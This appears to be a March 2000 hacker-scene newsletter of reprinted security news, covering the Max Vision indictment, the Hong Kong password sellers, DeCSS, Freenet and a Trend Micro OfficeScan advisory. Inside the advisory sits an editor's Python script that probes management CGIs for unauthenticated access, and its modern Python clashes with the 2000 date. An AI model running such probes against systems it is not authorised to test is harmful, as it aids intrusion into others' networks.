The legislation will apply only to telecommunications and information technology infrastructure attacks.

Used primarily by the media, FOIA allows members of the press and the public to file legally binding requests for public documents.

FOIA already contains an exemption for ongoing criminal investigations, but Davis and Moran are aiming to further protect firms that divulge information about cyberattacks, Marin said.

Reported by Newsbytes.com, http://www.newsbytes.com .
@HWA

66.0 HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

After selling stolen logon names and passwords three teenagers in Hong Kong were warned by Magistrate Ian Candy that they faced deterrent sentences. The three plead guilty to a total of 49 charges including the downloading and selling of music files. Sentencing has been scheduled for April 5th.

South China Morning Post
http://www.technologypost.com/features/Daily/20000322105804432.asp?Section FEATURES

Teen hackers face deterrent sentences

ELAINE PAK LI

Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong.

One of the trio, a student, was also convicted of downloading songs from the Internet and selling them for profit.

At Eastern Court, restaurant manager Tam Hei-lun and clerk Po Yiu-ming, both 19, and student Mak King-lam, 18, pleaded guilty to a total of 49 charges.

Magistrate Ian Candy remanded them in custody for sentencing on April 5, pending reports, and said: "It is precisely these kinds of computer crimes which leave Internet users in fear and make them pause before conducting even the most basic of transactions.

"These criminal activities should be nipped in the bud and a deterrent sentence must be imposed."

All the offences took place between March 1998 and May last year.

David Leung, prosecuting, told the court Po had hacked into other Internet users' computers and unlawfully obtained 127 login names and passwords given to Internet users when they subscribe to an Internet service provider for a monthly fee and an hourly rate.

The three defendants knew each other through the Internet and Po had sold some of his illegally obtained login names and passwords to Tam for $3,000, but gave others for free to Mak.
Tam later resold them for $1,500. The three were aware that the information they obtained was acquired illegally, the magistrate was told.

Mr Leung said the three defendants had hacked into the accounts of Internet users of Hongkong Telecom IMS Netvigator, Vision Network Ltd, City Telecom (HK), Netfront Information Technology and ABC Net, saving themselves the monthly fees and causing losses to the account holders.

Tam admitted 14 counts of obtaining access to a computer with a view to dishonest gain, Po admitted 12 and Mak two.

Mak also admitted 10 charges of selling pirated discs, in which he downloaded songs from the Internet and sold 200 discs from his own Web site. Each disc contained 100 songs and was priced at $88.

Tam, who asked buyers of the logins to deposit money into his bank account, also admitted eight counts of dealing with property known or reasonably believed to represent proceeds of an indictable offence.

Po admitted a further three charges of criminally damaging the computers of three users.

@HWA

67.0 HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Macki

Martin Garbus, an internationally distinguished New York attorney, and his firm (Frankfurt, Garbus, Klein, and Selz) have been retained by the defense in the New York MPAA DeCSS case. Two of the three defendants have withdrawn under consent agreements, leaving only 2600 Magazine and its publisher, Emmanuel Goldstein, as defendant. A trial date has been set for December 5, 2000.

2600
http://www.2600.com/news/2000/0324.html

Electronic Frontier Foundation - They are providing funding, please show your support!
http://www.eff.org

TRIAL DATE SET IN DECSS CASE - WORLD RENOWNED LEGAL TEAM TAKES CASE

03/24/00

The importance of the fight against the MPAA and the DVD Copy Control Association was underlined this week with the hiring of the legal team of Frankfurt, Garbus, Klein, and Selz to represent 2600. Martin Garbus, who will be the key lawyer on our side, has defended the likes of Lenny Bruce, Spike Lee, Samuel Beckett, Andrei Sakharov, and Vaclav Havel and is the author of "Tough Talk," published in 1998. He is a renowned First Amendment attorney and, thanks to funding from the Electronic Frontier Foundation, we have him in our court. Please show your support to the EFF for taking on this important case and help them to play a key role in whatever cases come up in the future.

We've already seen a significant development this week as we have been granted the time we need to build our defense. The court was prepared to start the trial on May 1st which is what the plaintiffs wanted. After presenting our arguments, we were given a court date of December 5th. This is a very good development for us as there is much to be prepared. An uninformed court would have been bad for all of us.

As the weeks and months progress, we will be in need of expert witnesses and testimony supporting our position. Your help and support will be invaluable as always. We will keep you updated as events progress.

@HWA

68.0 HNN:Mar 24th:Max Vision Indicted in San Jose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by McIntyre

A suspect in computer break-ins at NASA and the U.S. departments of energy, defense and transportation was indicted in San Jose on Wednesday. The indictment of Max Vision (Max Ray Butler) of Berkeley included charges of unauthorized access of a computer, recklessly causing damage and interception of electronic communication for a total of 15 counts.
Max Vision was previously an FBI informant who turned himself in on Tuesday.

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000323/us/hacker_indicted_1.html

Wednesday March 22 11:56 PM ET

Suspected Gov't Hacker Indicted

SAN FRANCISCO (AP) - A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors.

Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose.

On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars.

Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in on Tuesday.

Butler's attorney did not return a telephone call seeking comment.

-=-

More: (SfGate)
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/24/MN57003.DTL

FBI Computer Expert Accused of Hacking

Henry K. Lee, Chronicle Staff Writer
Friday, March 24, 2000

Max Ray Butler seemed to be at the top of his game.

For two years, the computer expert was a confidential source for an elite FBI computer crime squad, helping to ferret out scofflaws on the Internet.

Butler, also known as Max Vision, was also a self-described "ethical hacker" from the Silicon Valley who boasted that he could test the security of any computer system by penetrating it.

But Butler's cyber activity went too far, federal authorities say.
Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on a 15-count federal indictment charging him with hacking into computers used by the University of California at Berkeley, national laboratories, federal departments, air force bases across the country and a NASA flight center.

Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge Patricia Turnbull ordered him not to use computers except for work. Butler and his attorney, Jennifer Granick of San Francisco, could not be reached for comment.

The indictment, handed down March 15, said Butler caused "reckless damage" as a result of intrusions in May 1998. Butler was also charged with possession, with intent to defraud, of 477 passwords belonging to customers of a Santa Clara-based Internet service provider.

The case underscores the potential risks involved when law-enforcement agencies use confidential informants with access to sensitive information.

"Sources are often very close to criminal activity, and sometimes they cross the line," said Special Agent George Grotz, an FBI spokesman in San Francisco.

Grotz declined to say how Butler became an FBI informant and whether he was a federal source at the time of the alleged crimes. Grotz said Butler is no longer associated with the agency.

Friends of the suspect told the Associated Press that Butler was caught possibly violating the law several years ago and began working with the FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was unfairly targeted after refusing to comply with an FBI request.

A 22-month investigation by the FBI and military investigators ended Tuesday morning when federal agents converged on a home on Dwight Way near the UC Berkeley campus, where Butler lives with his 23-year-old wife, Kimi Winters. No one answered the door. Butler turned himself in to the FBI in Oakland later that day.
Butler grew up in Idaho and lived with his family in Washington, where authorities said he has a 1997 misdemeanor conviction for attempted trafficking of stolen property.

He developed a proficiency with computers, eventually attracting the attention of the FBI's Computer Crime Squad, which used him as a confidential informant. An FBI search warrant affidavit said Butler was "well known" to squad members and "has provided useful and timely information on computer crimes in the past."

In 1997, Butler started a company known as Max Vision in Mountain View, specializing in "penetration testing" and "ethical hacking" procedures in which he would simulate for clients how a hacker would penetrate their computer systems, according to the company Web site.

"Our client penetration rate is currently 100 percent," the site said, with recent clients including a large consortium of telecommunications companies, a major motion picture company and an e-commerce online auction service.

By 1998, Butler was living with Winters in a one-story San Jose apartment, where the couple started up their own Web-design company, Kimi Networks, records show. Reached by telephone yesterday, Winters hung up on a Chronicle reporter.

It was also from that apartment, according to the FBI, that Butler hacked into computers by using a computer software vulnerability known as a buffer overflow, which sends commands into a system that ordinarily would not be allowed.

Butler also allegedly invaded computers used by the Lawrence Berkeley National Laboratory. Vern Paxson, a computer scientist at the lab, noticed an online intruder conducting unauthorized scans of laboratory and UC Berkeley computers in May 1998 and used a monitoring device that later helped identify the source of the intrusions.
Paxson said yesterday that Butler's arrest was "somewhat ironic" but "not totally surprising." Paxson said a person later identified as Butler even sent him an apologetic e-mail a day after the computer intrusions. Butler also somehow obtained a confidential incident report Paxson had filed about the invasions, Paxson said.

@HWA

68.1 KYZSPAM: More on Max Vision.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: Dragos (email)

Further info from Dragos Ruiu and the Kyxspam world domination conspiracy

url: http://www.mediacentral.com/channels/allnews/03_23_2000.reutr-story-N23354790.html

Ex-FBI source charged with hacking

SAN JOSE, Calif., March 23 (Reuters) - A man officials say was once a confidential FBI source on computer hackers has been charged with allegedly breaking into computer systems belonging to NASA, the military and the U.S. departments of energy, defense and transportation, the U.S. Attorney's office said.

Max Ray Butler, 27, also known as Max Vision, was due to appear in court on Thursday to face charges of breaking into and damaging computers as well as possessing the passwords of customers of California Internet service provider Aimnet.

The indictment's 15 counts carry fines ranging from $5,000 up to $250,000 and jail terms totaling more than 50 years in prison, said officials at the U.S. Attorney's office in San Francisco.

A Federal Bureau of Investigation affidavit filed to support a search of his home showed Butler, of Berkeley, Calif., was a confidential source for FBI agents tracking computer crimes before authorities began their 22-month investigation of him in May 1998.

Butler, being held in lieu of $100,000 bond, surrendered on Tuesday to authorities in Oakland. He was scheduled to attend a bail review hearing on Thursday in U.S. District Court in San Jose.

The arrest comes amid growing concern over a number of recent high-profile computer hacker attacks.
But authorities said there is no connection between Butler and the "denial-of-service" attacks in early February that temporarily cut off customers to some of the Web's biggest sites, including Yahoo!, eBay, Amazon.com and E-Trade.

"There are no allegations related to denial-of-service attacks but we would characterize this as a serious case," said U.S. attorney Ross Nadler, chief of the office's newly created Computer Hacking and Intellectual Property unit.

Lawyers for Butler could not be reached for comment.

The FBI, the U.S. Air Force, NASA and the U.S. Navy began an investigation after several U.S. Air Force computer systems around the country were attacked in May 1998, although it was unclear when Butler became their focus.

Butler is accused of hacking into computers belonging to the U.S. Department of Energy's Argonne National Laboratories in Illinois and the Brookhaven National Laboratory in New York; NASA's Marshall Flight Center in Alabama; the office of the Secretary of Transportation in Washington, D.C.; the office of the Secretary of the Department of Defense in Washington, D.C.; and unspecified facilities of the Department of Defense, and IDSoftware of Mesquite, Texas.

© 2000 Reuters Limited. All rights reserved.

-=-

From: Dragos Ruiu
To: <*>
Sent: Thursday, March 23, 2000 2:51 PM

(Hmmm.... thanks Ken for the head's up. I am also in agreement: I don't know any of the details of the incident, but I do know that Max has been a valuable resource and has contributed enormous amounts of effort and knowledge to the entire computer security field. I hope that alone is of some mitigating consideration... --dr)

Berkeley man indicted, charged with hacking government computers

Copyright © 2000 Nando Media
Copyright © 2000 Associated Press

SAN FRANCISCO (March 23, 2000 8:20 a.m. EST http://www.nandotimes.com) - A suspected computer hacker appeared in court for the first time Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, federal prosecutors said.

Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose.

On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars.

Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in Tuesday.

Butler's attorney did not return a telephone call seeking comment.

--
dursec.com / kyx.net - we're from the future  http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com

-=-

From: Dragos

(I guess one of the interviews on radio ran this morning. This showed up on a local (MyBC) news page too, funny... I don't remember giving that quote to them. But out of all the negative light they could have shone I'm happy with the way it was handled. --dr)

url: http://www2.mybc.com/bc/news/fs.cfm?id=172752

Friday, Mar 24, 2000

Guest speaker busted

VANCOUVER (CKNW/AM980) -- An expert on Internet security who was scheduled to speak at a Vancouver conference has been arrested by the FBI.

Max Butler is charged with hacking into computers and destroying information.

One of the organizers of the local conference, Dragos Ruiu of Dursec-dot-com, says that Butler was very well known among those in the information technology sector.
"He ran an intrusion database, kind of like a big listing of signatures that people use to watch for hackers intruding into their network, and it was quite a famous data base," said Ruiu. "Lots of Fortune 500 companies and big sites use his database as a way of protecting their networks."

Ruiu is now scrambling to find a replacement for Butler. The conference runs May 10-12.

-=-

@HWA

69.0 HNN:Mar 24th:Koreans Attempt to Learn Security Secrets
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Apocalyse Dow

The Korean Advanced Institute of Science and Technology (KAIST) will conduct a 'hacking contest'. The contest is set to start in June and will offer 100 Million Won in prize money for defeating a firewall. (If they really expect to get anything out of this other than publicity they are sadly mistaken.)

Chosun
http://www.chosun.com/w21data/html/news/200003/200003220527.html

KAIST to Hold Hackers Contest

An international hacking contest will be held under the auspices of the Korean Advanced Institute of Science and Technology (KAIST) it was announced Wednesday. The Information Protection Education Research Center of the institute which formally opened the same day said that it will inject W300 million to host the First World Information Protection Contest (WIPC) in June.

The contest will have hackers attempt to break into a firewall the center has built. A total of W100 million prize money is prepared for the event, which aims to find out the international standard of hackers and to test the capacity of Korean information protection technology.

(Sim Jae-yool, jysim@chosun.com)

@HWA

70.0 HNN:Mar 24th:Rack Mount Your iMac
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Found on Slashdot

This has been posted elsewhere; it is just too cool not to link to. Who would have ever thought of hacking an iMac into a rack-mount? Definitely a cool hardware hack.
The iMac Rack-Mount Project
http://imac.pointinspace.com/

(Surf to the URL homeboyie! pics and plans available for this kewl hack, someone found a use for the iMac?? - Ed)

@HWA

71.0 HNS:Mar 24th:SECRETS STOLEN
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS (Help Net Security)
http://www.net-security.org/

by BHZ
Friday 24 March 2000 on 5:57 PM

British police said today they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland.

Link: Yahoo!
http://dailynews.yahoo.com/h/nm/20000324/tc/britain_spies_1.html

Friday March 24 10:18 AM ET

British Intelligence Laptop Stolen at Station

LONDON (Reuters) - British police said Friday they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland.

The laptop computer was snatched while an employee of Britain's domestic security service, MI5, was buying a ticket at London's Paddington train station.

"I can confirm that a laptop computer was stolen from the security service employee on March 4 at Paddington Underground (station)," said a government official who declined to be identified.

"The information contained in the laptop was well protected and we believe it to be secure. We are not prepared to discuss the nature of the material."

The information on the computer was understood to be heavily encrypted and was related to the situation in Northern Ireland, but not to refer to the state of the peace process or any guerrilla threat.

A spokesman for Prime Minister Tony Blair said officials were always concerned at the loss of any sensitive material, but they were confident it was secure and that national security had not been threatened.

"We believe this is an opportunistic theft and not a deliberate attempt to gain access to security service information," he said.
Asked why agents were walking around with security information on computers, the spokesman said there were strict procedures for moving classified material. ``You can certainly say they've been tightened since this incident,'' he added. The Sun newspaper said a squad of 150 police were working around the clock to catch the thief. Before the start of the 1991 Gulf War in Kuwait and Iraq, a laptop said to have contained war plans was stolen from the car of a Royal Air Force officer, who lost his job as a result. The latest theft comes as the peace process in Northern Ireland is in disarray. Last month Britain decided to suspend a fledgling home-rule government over lack of progress on disarmament by Irish Republican Army guerrillas. @HWA 72.0 HNS:Mar 24th:PATCH RELEASED BY TREND MICRO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS (Help Net Security) http://www.net-security.org/ by BHZ Friday 24 March 2000 on 5:43 PM Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). Link: Bugware http://www.net-security.org/cgi-bin/bugs/fullnews.cgi?newsid953916142,40085, Patch available for OfficeScan vulnerability Posted to BugTraq on March 24, 2000 Security Focus BugTraq ID: 1057 Posted: March 22, 2000 Summary ======= Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). These versions of OfficeScan allow intruders within a firewall to invoke OfficeScan CGIs on the server without authentication - bypassing OfficeScan management console password protection. These OfficeScan CGIs are intended for administrators to manage OfficeScan antivirus running on networked workstations via the OfficeScan management console. 
By gaining access to execute these CGIs, hackers can use them to change OfficeScan antivirus configurations or to uninstall OfficeScan antivirus on the desktops. Issues ====== Trend OfficeScan version 3.51 or earlier versions apply inadequate security settings on the OfficeScan server CGI components. If a malicious user has the ability to connect to the OfficeScan server via a web browser, these CGIs can be executed to send valid commands - including the uninstall command - to OfficeScan clients. In addition, OfficeScan's implementation of user authentication in its management console - password protection - was insufficiently encrypted, and allows a malicious user to decrypt and gain access to the OfficeScan management console. Implementation ============== Trend Micro has released a patch that will secure access to the OfficeScan CGIs on the server. The patch program changes the file permissions on the OfficeScan CGIs, so only administrators can access and execute them. This patch works only on drives formatted to use Windows NT file system (NTFS). After applying this patch, hackers will no longer be able to remotely invoke OfficeScan CGIs without being authenticated as an administrator by NTFS security. This patch also prevents hackers who sniff for the OfficeScan management console password over the network from gaining access to the OfficeScan management console. Access to the OfficeScan management console or to execute OfficeScan CGIs now requires NTFS authentication. Affected Software Versions ========================== Trend OfficeScan Corporate Edition 3.0 Trend OfficeScan Corporate Edition 3.11 Trend OfficeScan Corporate Edition 3.13 Trend OfficeScan Corporate Edition 3.50 Trend OfficeScan Corporate Edition 3.51 Trend OfficeScan for Microsoft SBS 4.5 This vulnerability is only present when the above software version is installed on a Windows NT server with IIS. 
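(Ed: a quick check to go with the OfficeScan item, added here and not part of Trend Micro's advisory. The patch puts an NTFS ACL in front of the management CGIs, so the thing to verify after applying it is that an anonymous request no longer runs the CGI: IIS should answer 401 with an NTLM challenge instead of 200. The advisory names no CGI, so the path below is a placeholder, and the two local servers are constructed stand-ins for an unpatched and a patched box.)

```python
"""
Confirm that an OfficeScan-style management CGI no longer answers an
anonymous request. Added example; not Trend Micro's code. The CGI path
is a placeholder (the advisory names no CGI). Two local servers stand
in for an unpatched server, which runs the CGI for anyone, and a
patched one, where the NTFS ACL makes IIS answer 401 with an NTLM
challenge unless the caller authenticates.
"""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

MGMT_CGI = "/officescan/cgi/placeholder.exe"   # assumed path, not a real one


def probe_unauthenticated(base_url: str, path: str = MGMT_CGI,
                          timeout: float = 3.0) -> str:
    """Anonymous GET of the CGI: 'EXPOSED', 'PROTECTED' or 'ABSENT'."""
    # ignore proxy environment variables so the probe really hits base_url
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    req = urllib.request.Request(base_url + path,
                                 headers={"User-Agent": "cgi-probe"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return "EXPOSED" if resp.status == 200 else "ABSENT"
    except urllib.error.HTTPError as err:
        # 401 (challenge) or 403 means an ACL now sits in front of the CGI
        return "PROTECTED" if err.code in (401, 403) else "ABSENT"


def _handler_for(protected: bool):
    """Build a request handler simulating a patched or unpatched server."""
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path != MGMT_CGI:
                self.send_error(404)
                return
            if protected and "Authorization" not in self.headers:
                self.send_response(401)            # what IIS does behind an ACL
                self.send_header("WWW-Authenticate", "NTLM")
                self.end_headers()
                return
            body = b"command accepted\n"           # the CGI ran
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *_):                 # keep the example quiet
            pass
    return Handler


def _start(protected: bool):
    srv = HTTPServer(("127.0.0.1", 0), _handler_for(protected))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_port


def check_both() -> dict:
    """Probe a simulated unpatched and a simulated patched server."""
    results = {}
    for label, protected in (("unpatched", False), ("patched", True)):
        srv, base = _start(protected)
        try:
            results[label] = probe_unauthenticated(base)
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    print(check_both())   # {'unpatched': 'EXPOSED', 'patched': 'PROTECTED'}
```

Point probe_unauthenticated() at the real server with the real CGI path and run it from a workstation inside the firewall, since that is where the advisory says the exposure is; a 200 after patching means the drive is not NTFS or the ACL did not take.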
It is not present when the above software version is installed on Novell NetWare servers or Windows NT server without IIS. Patch Availability ================== OfficeScan Unauthenticated CGI Usage patch can be downloaded from: http://www.antivirus.com/download/ofce_patch.htm More Information ================ Please see the following references for more information related to this issue. - Trend Micro Security Bulletin: http://www.antivirus.com/download/ofce_patch_351.htm - Frequently Asked Questions: Trend Micro Knowledge Base http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8 Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Trend Micro Technical Support is available at http://www.trend.com/support/default.htm Acknowledgements ================ Trend Micro thanks Gregory Duchemin http://www.securite-internet.com and Elias Levy http://www.securityfocus.com for reporting the OfficeScan server vulnerability to us, and working with us to protect our customers. @HWA 73.0 HNS:Mar 24th:PRIVACY ISSUES ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 5:32 PM The idea that privacy and security might be symptoms and not the problem emerged from a recent Webmaster focus group discussion with the Office of Personnel Management on defining Webmaster classifications. Link: FCW http://www.fcw.com/fcw/articles/2000/0320/web-dotgov-03-23-00.asp COMMENT Privacy, security on the Web require business know-how FCW's Dot-gov Thursday column BY Rich Kellet 03/23/2000 The idea that privacy and security might be symptoms and not the problem emerged from a recent Webmaster focus group discussion with the Office of Personnel Management on defining Webmaster classifications. We worked through the usual issues of defining technology Webmasters and content Webmasters. 
As we moved from the discussion of specialists to the issue of World Wide Web managers, an interesting perspective emerged from our discussions. Anecdotes and informal surveys are showing that about half of the Webmaster community works in mission-oriented program offices, which are not information technology organizations. This led to a discussion of the difference between managers in program organizations and managers in technology organizations. Web managers in program organizations tend to be business managers and Web managers in IT organizations tend to be technology managers. The conclusion of this discussion was to define a "breed" of Web manager under an IT series that is a technology manager or "Web technology manager." So, what about the concept of a classification for a Web business manager? I asked the group if anyone knew of a classification for business managers in the federal government. To my surprise, there does not appear to be one. It is important to pause at this point and consider what this means. Individuals who obtain business degrees, undergraduate or higher, have qualifications in an area recognized by the private sector as a unique skill and a profession in its own right. These skills are essential to running large programs that deliver the government’s products and services to the public or other agencies. When I developed the top skill areas that a federal Web manager needs so that the Webmaster can deliver programs online, to my own surprise, most of the required skills originated from business skills, such as accounting and financial management and budgeting. As I looked across government, I found surprisingly little information on what it means to run a business in the federal government context. There is plenty of information on, for instance, project management, but managing a project is not running a business. There is plenty of information on policy, but carrying out policy is not running a business. 
There is plenty on management, but management skills are not the only skills required to run a business. Courses in small business or college programs in business administration provide samples of the curriculums that define the skills needed to run a business. Running a business over the Web in government is about understanding, integrating and applying principles and processes related to leadership, culture, business processes and components, management, policy, and technology into a functioning organization that delivers a set of products and services to the public or other agencies. The issues of privacy and security are difficult to incorporate into Web sites because they challenge our abilities as business managers. Privacy and security are not "modules" you can buy off the shelf. It is not solely a technology issue, a people issue or a system issue. Privacy and security are "embedded and threaded" throughout the business processes, the organization’s working knowledge and the supporting technology infrastructure. At each level of the architecture and in the operations of the business, people and assets (routers, servers, operating systems and other components) Web masters must incorporate privacy and security concepts and solutions. To solve privacy and security requires a commitment to re-inventing business processes, developing the organization’s business and technology skills, and improving the underlying infrastructure. This is the stuff of a Web business manager. This is far beyond just "plugging holes" in operating systems or applications. Solving privacy and security is an enterprisewide issue that requires Web business leaders working with other business leaders in the agency. With the Web becoming the central construct for delivering products and services, the government is going to need Web business managers. We have many now, and we need to continue to grow this portion of the work force. So, where does that leave us? 
Not surprisingly, it is a business decision to decide whether to solve these issues by funding them appropriately, to develop business processes that incorporate privacy and security, and to build and continuously improve our organizational knowledge for putting in place privacy and security solutions. We can spend a lot of time on chasing privacy or security holes or solve the problem more efficiently and in less time by looking at the whole business. -- Kellet is founder of the Federal Web Business Council, co-chair of the Federal Webmaster Forum, and is director of GSA’s Emerging IT Policies Division. @HWA 74.0 HNS:Mar 24th:TARGETING ONLINE SCAMMERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 11:34 AM Law enforcement officials from 27 countries and 45 states have conducted a massive sweep of the Internet searching for "get-rich-quick" schemes and scams, the Federal Trade Commission said Thursday. Link: ZDNet http://mcafee.snap.com/main/page/pcp/cd/0,85,-1715-1085412-303380,00.html Authorities target online scammers By Margaret Kane, ZDNet News 03/23/2000 10:22 Law enforcement officials from 27 countries and 45 states have conducted a massive sweep of the Internet searching for "get-rich-quick" schemes and scams, the Federal Trade Commission said Thursday. More than 1,600 sites were uncovered in the "Get-Rich-Quick.con" program, one of several "surfs" the agency conducted looking for problems and crimes on the Net. The latest sweep hooked up law enforcement officials across state and national borders and involved hundreds of researchers who scoured the Net for scam artists. Many languages, one voice "We want them to know that the borderless Internet marketplace is not a free zone for fraud," said Jodie Bernstein, director of the FTC Bureau of Consumer Protection. "Though we speak different languages on the subject of Internet fraud, we speak with one voice. 
Our message is: Con artists will not threaten the safety of the Net." Some of the schemes promised users rewards such as "surf the Net and earn $100 an hour," he said. Authorities also found a variety of pyramid schemes, outrageous product claims and outright fraud. The sites are sent e-mail warnings, and documentation of the sites is provided to law enforcement agencies in the various jurisdictions, which will be able to further investigate and press charges, if necessary. Bernstein said the agencies could begin filing charges in June or July. Calling out the cyberposse "As an old prosecutor I'm looking forward to Phase Two. Once we've investigated, as the old sheriff would do, we're going to run them out of town and run them off the Web," said Drew Edmondson, Oklahoma attorney general. "And where appropriate we'll put them in jail." It came as no surprise to speakers at Thursday's news conference that con artists have migrated onto the Web. About half of the U.S. Postal Service's mail fraud investigations begin as online solicitations, said Lawrence Maxwell, USPS inspector in charge of fraud, prohibited mailings and forfeiture investigations. It's easy for con artists to target consumers "in an age dominated by a 'Who Wants to be a Millionaire' mentality," said Richard Walker, enforcement director for the Securities and Exchange Commission. @HWA 75.0 HNS:Mar 24th:FEARS OF FREENET ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 11:30 AM A report by a British scientific magazine suggests that an anonymous Internet system designed to guarantee free speech online could be used by child pornographers, terrorists and others with less-than-pristine purposes. 
Link: Computer Currents http://www.currents.net/newstoday/00/03/24/news5.html Daily News Freenet Raises Security Fears By Martin Stone, Newsbytes March 24, 2000 A report by a British scientific magazine suggests that an anonymous Internet system designed to guarantee free speech online could be used by child pornographers, terrorists and others with less-than-pristine purposes. A Reuters report today said a New Scientist magazine article on the Freenet program, which was created by Edinburgh University graduate Ian Clarke and others to make tracing file originators impossible, thereby giving dissidents in countries without free speech a voice, could be misused by those with sinister designs. The report stated that the Internet Watch Foundation, an independent body monitoring Web sites in Britain, fears the decentralized system could make policing the Net and tracking down computer crimes even more difficult. "There is clear potential for misuse by criminals, terrorists and pedophiles," Roger Darlington, chairman of the foundation, told the weekly magazine in its latest issue, Reuters reported. Users of Freenet are difficult to track down because files do not contain a unique Web address and are distributed on computers belonging to Freenet members. To retrieve a file, users enter the key, Reuters said. According to Clarke, a single computer user cannot be held responsible for Freenet files because the originator cannot be traced. "It's perfect machine anarchy," he is quoted as saying. "No single computer is in control." Reported by Newsbytes.com @HWA 75.1 Anonymous net access aiding and abetting online criminals? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Dragos Ruiu url: http://www.wired.com/news/technology/0,1282,34768,00.html Alternative Net Protects Pirates by Leander Kahney 3:00 a.m. 
8.Mar.2000 PST Open-source advocates are developing an alternative publishing network that promises to provide true anonymity in sharing documents and files over the Internet. But in addition to protecting free speech, the new system also could be a boon for multimedia pirates. Freenet is an open-source file-transfer system similar to the Web for sharing digital content such as HTML pages and MP3 music files. It will be run by connected clusters of servers or node stations that could in turn be run on almost any PC connected to the Internet. But unlike the Web, Freenet has no centralized administrative infrastructure of domain name servers (DNS) and IP addresses that can be used to track users. Hosting and replicating documents and files requires that Freenet backers volunteer their time and resources. Because Freenet aims to be anonymous, secure, and without centralized control, it would make it almost impossible to trace people who post content -- legal or otherwise -- onto the network. "My primary motivation was to make it very difficult to censor information," said Ian Clarke, an Irish programmer who designed the system. "With the Internet there's the potential to censor and monitor people to a degree that's never been possible before. I wanted to develop the technology to make this impossible." Clarke started work on Freenet 18 months ago as a graduate student in artificial intelligence at Edinburgh University. He had been outraged by the Australian government's proposal to introduce sweeping censorship laws, which went into effect in January. Clarke hopes to launch the first public version in the spring, but he said the system is still pretty rough. The server is nearly finished, but so far there are no browsers, or clients, to make the network easy to use. Freenet software will be released under the GNU public license, which will allow anyone to freely distribute and change the source code. 
